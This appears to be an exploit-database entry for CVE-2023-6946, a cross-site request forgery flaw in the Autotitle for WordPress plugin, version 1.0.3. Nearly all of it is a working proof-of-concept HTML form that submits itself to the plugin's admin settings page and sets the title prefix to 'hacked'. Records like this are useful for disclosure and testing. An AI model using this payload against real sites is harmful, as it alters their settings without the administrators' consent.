CVE: CVE-2023-6946

Name: Autotitle for WordPress (autotitle-for-wordpress)

Version: 1.0.3

Date: 2022-12-10 19:27:25

Advisory: 

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=autotitle-for-wordpress.php" method="POST">
    <input type="text" name="publish_only" value="Y">
    <input type="text" name="limit" value="3">
    <input type="text" name="maxlimit" value="6">
    <input type="text" name="stoppers" value="! ? . ,">
    <input type="text" name="include_stopper" value="Y">
    <input type="text" name="exclude_stopper" value=",">
    <input type="text" name="prefix" value="hacked">
    <input type="text" name="postfix" value="">
    <input type="text" name="do" value="Update">
</form>
<script>
    document.forms[0].submit();
</script>